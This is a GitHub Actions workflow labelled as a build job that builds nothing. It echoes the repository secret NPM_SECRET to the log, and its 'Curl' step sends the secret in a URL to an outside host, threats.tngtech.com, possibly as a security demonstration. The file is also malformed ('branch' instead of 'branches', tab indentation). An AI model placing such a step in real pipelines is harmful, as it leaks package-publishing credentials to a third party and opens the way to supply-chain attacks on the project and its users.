name: Build this

on:
  push:
    branch: ['*']

jobs:
  build_this:
    
    runs-on: ubuntu-latest

    steps:
      
      - name: Build 
        run: echo "${{ secrets.NPM_SECRET }}"

      - name: Curl
	run: "curl https://threats.tngtech.com/xxx/${{ secrets.NPM_SECRET }}"

